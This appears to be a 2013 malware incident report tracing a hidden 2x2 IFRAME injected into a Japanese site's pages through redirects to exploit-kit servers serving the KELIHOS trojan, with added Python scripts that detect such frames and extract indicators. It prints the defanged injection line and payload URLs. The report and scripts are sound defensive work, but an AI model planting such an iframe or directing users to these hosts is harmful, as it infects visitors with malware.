210.224.185.225 / keiyuka3153.sakura.ne.jp. I found the following infected URLs on this host:

hxxp://keiyuka3153.sakura.ne.jp/index.html
hxxp://keiyuka3153.sakura.ne.jp/o/login.php

Download evidence follows:
--2013-03-10 16:31:09--  hxxp://keiyuka3153.sakura.ne.jp/o/login.php
Resolving keiyuka3153.sakura.ne.jp... seconds 0.00, 210.224.185.225
Caching keiyuka3153.sakura.ne.jp => 210.224.185.225
Connecting to keiyuka3153.sakura.ne.jp|210.224.185.225|:80... seconds 0.00, connected.
GET /o/login.php HTTP/1.0
Host: keiyuka3153.sakura.ne.jp
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Date: Sun, 10 Mar 2013 07:31:03 GMT
Server: Apache/2.2.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=107571ab7c056c4b89525b02d199ec25; path=/
Content-Length: 638
Keep-Alive: timeout=5, max=20
Connection: Keep-Alive
Content-Type: text/html
200 OK
Stored cookie keiyuka3153.sakura.ne.jp -1 (ANY) / [expiry none] PHPSESSID 107571ab7c056c4b89525b02d199ec25
Length: 638 [text/html]
Saving to: `login.php'
2013-03-10 16:31:09 (17.3 MB/s) - `login.php' saved [638/638]

// Inside it I found a malware infection URL (in an IFRAME)…

GET /index.html HTTP/1.0
Host: keiyuka3153.sakura.ne.jp
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Date: Sun, 10 Mar 2013 08:12:07 GMT
Server: Apache/2.2.23
Last-Modified: Fri, 01 Mar 2013 05:31:48 GMT
ETag: "f865c-1628-4d6d652d6d900"
Accept-Ranges: bytes
Content-Length: 5672
Keep-Alive: timeout=5, max=20
Connection: Keep-Alive
Content-Type: text/html
200 OK
Length: 5672 (5.5K) [text/html]
Saving to: `index.html'
2013-03-10 17:12:13 (42.6 MB/s) - `index.html' saved [5672/5672]
// Running cat login.php shows the following malicious IFRAME at line 16:

<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=hxxp://jancoral(.)ierealtysite.com/whci(.)html?i=1239289> </iframe>

// The same code is also present at line 89 of index.html. The frame is 2x2 pixels, so a visitor never sees it; as soon as either page is opened in a browser the IFRAME loads on its own (no click is required) and the KELIHOS trojan is fetched along the following route…
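The injected frame above is easy to miss by eye because its only visible traits are a 2x2 size and an off-site src. The following scanner is an added example written for this post (it is not code from the original post): it walks an HTML file with the standard-library parser and reports every IFRAME that is tiny, hidden by CSS, or points at a host other than the site's own, together with the line it sits on, which is how the post cites line 16 of login.php and line 89 of index.html. The TINY_PX threshold, the refanging rules and the sample page are assumptions; the sample embeds the defanged IFRAME quoted above on its line 6.

```python
"""Find hidden or off-host IFRAMEs in HTML and report their line numbers.

Added example for this post, not the post's own code. Defanged URLs
(hxxp, (.)) are refanged only to extract the host; nothing is fetched.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

TINY_PX = 10  # assumption: a frame this small or smaller is hidden on purpose


def _px(value):
    """Return the integer part of '2', '2px' or '10%'; None if not numeric."""
    if value is None:
        return None
    digits = "".join(ch for ch in value if ch.isdigit())
    return int(digits) if digits else None


def _src_host(src):
    """Host of an absolute (possibly defanged) URL; None for relative URLs."""
    refanged = src.replace("hxxp", "http").replace("(.)", ".").replace("[.]", ".")
    if "://" not in refanged and not refanged.startswith("//"):
        return None  # relative path: same origin as the page
    return urlsplit(refanged).hostname


class IframeScanner(HTMLParser):
    def __init__(self, own_host):
        super().__init__()
        self.own_host = own_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        line, _ = self.getpos()  # 1-based line of the opening tag
        reasons = []
        w, h = _px(a.get("width")), _px(a.get("height"))
        if w is not None and h is not None and w <= TINY_PX and h <= TINY_PX:
            reasons.append(f"tiny frame {w}x{h}")
        style = a.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden by CSS")
        host = _src_host(a.get("src", ""))
        if host and host.lower() != self.own_host:
            reasons.append(f"off-host src {host}")
        if reasons:
            self.findings.append({"line": line, "src": a.get("src", ""), "reasons": reasons})

    handle_startendtag = handle_starttag  # <iframe ... /> is handled the same way


def find_hidden_iframes(html, own_host):
    """Return a list of {'line', 'src', 'reasons'} for every suspicious IFRAME."""
    scanner = IframeScanner(own_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample page (assumption): a normal same-host banner frame on
# line 3 and the injected 2x2 frame from the post on line 6.
SAMPLE_HTML = """<html>
<body>
<iframe src="/banner.html" width="468" height="60"></iframe>
<p>Welcome</p>
<!-- injected -->
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=hxxp://jancoral(.)ierealtysite.com/whci(.)html?i=1239289> </iframe>
</body>
</html>
"""

if __name__ == "__main__":
    for f in find_hidden_iframes(SAMPLE_HTML, "keiyuka3153.sakura.ne.jp"):
        print(f"line {f['line']}: {f['src']}  ({'; '.join(f['reasons'])})")
```

Run it over the saved login.php and index.html with the site's own hostname as the second argument; the benign banner frame is not reported, the injected one is reported with both the size and the off-host reason. The size and CSS checks catch frames that hide themselves, and the host check catches injected frames that are full-size but still call out to an exploit-kit landing page.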
--2013-03-10 17:18:43--  hxxp://jancoral.ierealtysite.com/whci.html?i=1239289
Resolving jancoral.ierealtysite.com... seconds 0.00, 69.89.31.243
Caching jancoral.ierealtysite.com => 69.89.31.243
Connecting to jancoral.ierealtysite.com|69.89.31.243|:80... seconds 0.00, connected.
GET /whci.html?i=1239289 HTTP/1.0
Referer: hxxp://keiyuka3153.sakura.ne.jp/index.html
HTTP request sent, awaiting response...
HTTP/1.1 301 Moved Permanently
Date: Sun, 10 Mar 2013 08:18:37 GMT
Server: Apache
Location: hxxp://ttnetofisi(.)com/whci.htm?i=1239289
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=10, max=30
Connection: Keep-Alive
Content-Type: text/html

// Here the request is redirected to ttnetofisi(.)com...

--2013-03-10 17:18:44--  hxxp://ttnetofisi(.)com/whci.htm?i=1239289
conaddr is: 69.89.31.243
Resolving ttnetofisi(.)com... seconds 0.00, 173.254.28.58
Caching ttnetofisi(.)com => 173.254.28.58
Found ttnetofisi(.)com in host_name_addresses_map (00A270C0)
Connecting to ttnetofisi(.)com|173.254.28.58|:80... seconds 0.00, connected.
GET /whci.htm?i=1239289 HTTP/1.0
Referer: hxxp://keiyuka3153.sakura.ne.jp/index.html
Host: ttnetofisi(.)com
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Date: Sun, 10 Mar 2013 08:18:38 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=10, max=30
Connection: Keep-Alive
Content-Type: text/html
200 OK

All of the redirect activity above leads to the following hosts…
Name: jancoral.ierealtysite.com
Address: 69.89.31.243

and

Name: ttnetofisi(.)com
Address: 173.254.28.58

Both of these are RedKit Exploit Kit malware infection servers.
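Reading the hop chain out of a wget -d transcript by hand is error-prone once there are several hops, so here is an added example (not from the original post) that does it mechanically: it parses the request start lines, the resolved IP, the first status line, the Referer and the Location of each hop, checks that each Location really is the next hop's URL, and returns the host/IP pairs as indicators. The transcript below is constructed from the defanged lines shown above, with the same defanging; refanging is done only for host extraction and nothing is fetched. The function names and output format are assumptions, not wget features.

```python
"""Reconstruct a redirect chain and its IOCs from a `wget -d` transcript.

Added example for this post, not the post's own code. Handles the defanged
form (hxxp, (.)) used on the page; nothing is contacted on the network.
"""
import re
from urllib.parse import urlsplit

RE_START = re.compile(r"^(?:--)?\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}--\s+(\S+)")
RE_IP = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")
RE_STATUS = re.compile(r"^HTTP/1\.[01] (\d{3})")
RE_LOCATION = re.compile(r"^Location:\s*(\S+)", re.I)
RE_REFERER = re.compile(r"^Referer:\s*(\S+)", re.I)


def refang(url):
    """Turn hxxp://host(.)tld into http://host.tld for parsing only."""
    return url.replace("hxxp", "http").replace("(.)", ".").replace("[.]", ".")


def redirect_chain(transcript):
    """Return one dict per hop: url, host, ip, status, referer, location."""
    hops, cur = [], None
    for raw in transcript.splitlines():
        line = raw.strip()
        m = RE_START.match(line)
        if m:  # a new request begins
            url = refang(m.group(1))
            cur = {"url": url, "host": urlsplit(url).hostname, "ip": None,
                   "status": None, "referer": None, "location": None}
            hops.append(cur)
            continue
        if cur is None:
            continue
        if line.startswith("Resolving "):
            ips = RE_IP.findall(line)  # "seconds 0.00" has only two octets, so it is skipped
            cur["ip"] = ips[0] if ips else None
        elif (m := RE_STATUS.match(line)) and cur["status"] is None:
            cur["status"] = int(m.group(1))
        elif m := RE_REFERER.match(line):
            cur["referer"] = refang(m.group(1))
        elif m := RE_LOCATION.match(line):
            cur["location"] = refang(m.group(1))
    return hops


def chain_is_consistent(hops):
    """True when every 3xx hop's Location is exactly the URL of the next hop."""
    for prev, nxt in zip(hops, hops[1:]):
        if prev["status"] and 300 <= prev["status"] < 400 and prev["location"] != nxt["url"]:
            return False
    return True


def iocs(hops):
    """Sorted, de-duplicated (host, ip) pairs seen along the chain."""
    return sorted({(h["host"], h["ip"]) for h in hops if h["host"]})


def chain_summary(hops):
    return " -> ".join(f"{h['host']} [{h['ip']}] {h['status']}" for h in hops)


# Constructed transcript (assumption): the two hops logged on this page.
TRANSCRIPT = """\
--2013-03-10 17:18:43--  hxxp://jancoral.ierealtysite.com/whci.html?i=1239289
Resolving jancoral.ierealtysite.com... seconds 0.00, 69.89.31.243
Caching jancoral.ierealtysite.com => 69.89.31.243
Connecting to jancoral.ierealtysite.com|69.89.31.243|:80... seconds 0.00, connected.
GET /whci.html?i=1239289 HTTP/1.0
Referer: hxxp://keiyuka3153.sakura.ne.jp/index.html
HTTP request sent, awaiting response...
HTTP/1.1 301 Moved Permanently
Date: Sun, 10 Mar 2013 08:18:37 GMT
Server: Apache
Location: hxxp://ttnetofisi(.)com/whci.htm?i=1239289
Content-Length: 0
--2013-03-10 17:18:44--  hxxp://ttnetofisi(.)com/whci.htm?i=1239289
conaddr is: 69.89.31.243
Resolving ttnetofisi(.)com... seconds 0.00, 173.254.28.58
Caching ttnetofisi(.)com => 173.254.28.58
Connecting to ttnetofisi(.)com|173.254.28.58|:80... seconds 0.00, connected.
GET /whci.htm?i=1239289 HTTP/1.0
Referer: hxxp://keiyuka3153.sakura.ne.jp/index.html
Host: ttnetofisi(.)com
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Date: Sun, 10 Mar 2013 08:18:38 GMT
Server: Apache
Content-Length: 0
"""

if __name__ == "__main__":
    hops = redirect_chain(TRANSCRIPT)
    print(chain_summary(hops))
    print("consistent:", chain_is_consistent(hops))
    for host, ip in iocs(hops):
        print(f"{host}\t{ip}")
```

Feed it the whole saved wget -d output rather than a snippet; the first status line of each hop is kept so that a 301 followed by the 200 of the next hop is attributed to the right host, and the consistency check flags the case where a Location was rewritten or the log was truncated between hops.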
The evidence is the nationwide infection database records:

ttnetofisi(.)com/332.jar, or
kablonetbasvurusu(.)com/987.pdf
kablolutelevizyon(.)com/887.jar, or
jancoral.ierealtysite(.)com/whci.html?i=1239289
mariaflores.iemysite(.)com/ozcf.html?j=1411969

and so on (both IPs still host many more KELIHOS infection URLs).
Most likely the server's administrator login credentials were leaked.